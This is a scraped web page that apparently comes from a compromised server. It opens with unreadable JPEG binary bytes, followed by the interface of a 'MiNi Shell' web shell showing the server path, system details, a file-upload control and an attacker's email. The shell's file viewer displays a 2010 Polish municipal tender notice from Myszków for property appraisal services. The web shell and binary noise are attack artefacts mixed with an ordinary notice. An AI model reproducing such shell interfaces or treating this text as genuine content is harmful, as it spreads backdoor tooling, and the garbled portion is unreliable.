JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/11468-N-2010.html

<p class="kh_header"><b>Myszków: Wykonanie operatów szcunkowych</b><br>
<b>Numer ogłoszenia: 11468 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Myszków , ul. Kościuszki 26, 42-300 Myszków, woj. śląskie, tel. (034) 313 26 82, faks (034) 313 50 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.myszkow.bip.jur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operatów szcunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Wykonanie  operatu szacunkowego określającego wartość rynkową lokalu mieszkalnego przeznaczonego do  zbycia  wraz z  przynależnym gruntem.  Operat szacunkowy lokalu  mieszkalnego winien zawierać inwentaryzację tego lokalu oraz   
zaświadczenie o samodzielności  lokalu.
2 Wykonanie operatu szacunkowego określającego wartość rynkową nieruchomości   zabudowanej  garażem, przeznaczonej do zbycia.
3 Wykonanie operatu szacunkowego określającego wartość prawa własności nieruchomości    lub wartości prawa użytkowania wieczystego nieruchomości  niezabudowanej, przeznaczonej do zbycia, zamiany lub w celu jej nabycia na rzecz  Gminy.
4 Wykonanie operatu szacunkowego określającego wartość  prawa własności  nieruchomości   oraz  wartości prawa  użytkowania wieczystego tej nieruchomości  w celu jej   sprzedaży na    rzecz użytkownika wieczystego lub przekształcenia prawa użytkowania wieczystego w prawo    własności - jak również w celu wykorzystania niniejszego operatu do aktualizacji opłaty z    tytułu użytkowania wieczystego gruntu.
5 Wykonanie operatu szacunkowego określającego wartość nieruchomości niezabudowanej   zajętej pod drogę .
6 Wykonanie operatu szacunkowego określającego wartość nieruchomości w celu ustanowienia prawa     użytkowania wieczystego gruntu na rzecz posiadacza lub użytkownika . 
7 Wykonanie operatu  szacunkowego nieruchomości zabudowanej  obiektami o funkcji  usługowej lub mieszkalno-usługowej w celu jej zbycia przez Gminę lub w celu jej nabycia na   rzecz Gminy.
8 Wykonanie operatu szacunkowego w celu ustalenia jednorazowej opłaty z tytułu  wzrostu  wartości nieruchomości,  w  związku z uchwaleniem planu miejscowego lub jego zmianą, zgodnie z   art. 36 ust.4 ustawy o planowaniu i   zagospodarowaniu przestrzennym lub  w celu ustalenia odszkodowania z tytułu obniżenia  wartości nieruchomości, w  związku  uchwaleniem planu miejscowego lub jego zmianą, zgodnie z art.36    ust.3 ustawy o    planowaniu i  zagospodarowaniu.
9  Wykonanie inwentaryzacji lokalu mieszkalnego w budynku  wielorodzinnym wraz z opisem  technicznym, rzutami poziomymi poszczególnych kondygnacji, zestawieniem powierzchni użytkowej poszczególnych inwentaryzowanych lokali i pomieszczeń przynależnych oraz   wyliczeniem udziałów we współwłasności części wspólnych budynku i gruntu.
10 Wykonanie operatu szacunkowego określającego wartość nieruchomości oddanej w trwały zarząd w celu ustalenia ceny nieruchomości .
11 Wykonanie operatu szacunkowego w celu ustalenia pierwszej opłaty w przypadku sprzedaży prawa użytkowania wieczystego, przed upływem 10 lat od jego ustanowienia , jak również w celu wykorzystania niniejszego operatu do aktualizacji opłaty z tytułu użytkowania wieczystego gruntu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.01-.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Posiadanie uprawnień  do wykonywania określonej działalności  lub czynności, jeżeli  ustawy   nakładają obowiązek posiadania takich uprawnień,
2. Posiadanie wiedzy i doświadczenia,
3. Dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 
4. Sytuacjia ekonomiczna i finansowa.
Warunki będą spełnione jeżeli:
Ad 1.1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,   załączone do oferty i wystawione nie wcześniej niż 6 m-cy przed upływem terminu  składania ofert, będzie  określało przedmiot działalności odpowiadający przedmiotowi zamówienia,
Ad 1.2) wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli prowadzona działalności jest krótsza - w tym okresie, z podaniem ich wartości , przedmiotu, dat wykonania i odbiorów, oraz załączonego dokumentu wykazuje, że usługi zostały lub są wykonywane należycie, 
Ad 1.3) z wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia - niezbędnych dla wykonania zamówienia , a także zakresu wykonywanych przez nie czynności , oraz informacją o podstawie do dysponowania tymi osobami, wynikać będzie, że Wykonawca dysponuje osobami, które posiadają kwalifikacje zawodowe niezbędne do wykonania zamówienia. 
Ad 1.4) z aktualnie opłaconej  polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, wynika, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w  zakresie  prowadzonej działalności  związanej z przedmiotem zamówienia. 
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1, Zamawiający  żąda  następujących dokumentów:
2.1 Oświadczenia o braku podstaw do wykluczenia - wzór dokumentu załączony  do  SIWZ,
2.2 Aktualnego zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że  Wykonawca  nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczeni lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego organu  - wystawionego nie wcześniej niż 3 miesiące przed upływem 
terminu składania wniosków o dopuszczenie do   udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2.3 Aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do  udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. Sposób dokonania spełnienia wymaganych warunków:
3.1 Przy dokonywaniu oceny spełnienia  warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
3.2 Niespełnienie  chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania , ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca składa zgodnie z art. 44 ustawy p.z.p.:
1.1 Ofertę z załącznikami,
1.2 Oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu określonych w art.22 ust.1 pzp,
1.3 Aktualny  odpis z właściwego rejestru  albo zaświadczenie o wpisie do ewidencji gospodarczej, z  którego wynika, że przedmiot działalności firmy odpowiada przedmiotowi zamówienia wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, 
1.4 Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca  nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczeni lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
1.5 Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z  opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub 
potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
1.6 Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia  - wzór dokumentu załączony do SIWZ,
1.7  Wykaz wykonanych usług  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów - wzór dokumentu załączony do SIWZ,
1.8  Oświadczenie o braku podstaw do wykluczenia  art.24 ust.1 i 2 pzp,
1.9  Oświadczenie o zobowiązaniach,
1.10  Dokumenty potwierdzające, że osoby które będą uczestniczyć w wykonaniu zamówienia  posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - uprawnienia rzeczoznawcy majątkowego i uprawnienia budowlane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.myszkow.bip.jur.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Nieruchomości i Urbanistyki Urzędu Miasta w Myszkowie
ul. Kościuszki nr 26
42-300 Myszków
tel. (0...34) 313-26-82,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego przy ul. Kościuszki 26 w Myszkowie w   pokoju nr  109   (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com